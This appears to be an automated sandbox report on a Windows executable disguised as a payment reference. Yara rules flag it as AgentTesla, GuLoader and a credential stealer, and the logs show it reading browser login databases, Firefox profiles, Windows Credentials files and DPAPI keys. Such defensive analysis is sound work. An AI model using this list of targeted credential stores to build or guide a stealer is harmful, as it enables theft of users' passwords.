Commandline: "C:\Users\user\Desktop\ref002062022pago062022.exe"
Imagebase: 0xce0000
File size: 108664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown
C:\Users\user\AppData\Roaming read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown
C:\Users\user read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown
C:\Users\user\AppData\Roaming read data or list directory | synchronize device directory file | synchronous io non alert | open for backup ident | open reparse point object name collision 1 6E313263 unknown
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
\Device\ConDrv 0 0 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile
\Device\ConDrv 30 30 75 6e 6b 6e 6f 77 6e unknown success or wait 1 6D1C9B71 WriteFile
File Read
File Path Offset Length Completion Count Source Address Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6E31099B unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll.aux unknown 176 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31D97A ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31D97A ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31D97A ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll.aux unknown 620 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\96b2b7229c43d2712ff1bf4906a723f6\System.Configuration.ni.dll.aux unknown 864 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll.aux unknown 900 success or wait 1 6E2662DE ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\5a5dc2f9e9c66b74d361d490c1f4357b\System.Xml.ni.dll.aux unknown 748 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll.aux unknown 764 success or wait 1 6E2662DE ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 4095 success or wait 1 6E31099B unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe.config unknown 8173 end of file 1 6E31099B unknown
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data unknown 49152 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 success or wait 3 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 624 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Program Files (x86)\jDownloader\config\database.script unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 45056 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612 unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3425316567-2969588382-3778222414-1001\4280e3d2-e3f0-4650-bde8-f55a3425c6eb unknown 4096 success or wait 2 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612 unknown 4096 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D unknown 11120 success or wait 1 6D1C9B71 ReadFile
C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D unknown 11120 success or wait 1 6D1C9B71 ReadFile
Registry Activities
Key Created
Key Path Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS success or wait 1 6C45FDB8 unknown
Key Value Created
Key Path Name Type Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS EnableFileTracing dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS EnableAutoFileTracing dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS EnableConsoleTracing dword 0 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS FileTracingMask dword -65536 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS ConsoleTracingMask dword -65536 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS MaxFileSize dword 1048576 success or wait 1 6C45FDB8 unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\caspol_RASMANCS FileDirectory expand unicode %windir%\tracing success or wait 1 6C45FDB8 unknown
Analysis Process: conhost.exe PID: 1840, Parent PID: 1836
General
Target ID: 8
Start time: 16:46:06
Start date: 02/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff72efe0000
File size: 875008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
File Activities
File Path Offset Length Completion Count Source Address Symbol
Analysis Process: svchost.exe PID: 1900, Parent PID: 888
General
Target ID: 36
Start time: 16:52:03
Start date: 02/06/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase: 0x7ff73d000000
File size: 57360 bytes
MD5 hash: F586835082F632DC8D9404D83BC16316
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Registry Activities
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Disassembly
⊘ No disassembly